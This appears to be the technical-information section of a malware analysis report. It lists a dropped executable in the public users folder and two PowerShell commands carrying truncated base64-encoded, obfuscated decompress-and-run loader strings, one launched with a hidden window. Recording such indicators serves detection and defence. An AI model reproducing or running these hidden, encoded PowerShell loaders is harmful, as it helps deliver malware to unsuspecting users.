Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAGUAdwAtAG8AYgBKAGUAQwBUACAAIABJAE8ALgBDAG8ATQBwAFIARQBzAHMAaQBPAE4ALgBkAGUARgBMAGEAdABFAFMAdABSAEUAYQBNACgAWwBJAE8ALgBtAEUAbQBvAFIAWQBTAHQAcgBFAEEATQBdACAAWwBjAG8AbgBWAGUAcgB0AF0AOgA6AG...
- C:\users\public\203248.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAGUAdwAtAG8AYgBKAGUAQwBUACAAIABJAE8ALgBDAG8ATQBwAFIARQBzAHMAaQBPAE4ALgBkAGUARgBMAGEAdABFAFMAdABSAEUAYQBNACgAWwBJAE8ALgBtAEUAbQBvAFIAWQBTAHQAcgBFAEEATQBdACAAWwBjAG8AbgBWAGUAcgB0AF0AOgA6AG...' (with hidden window)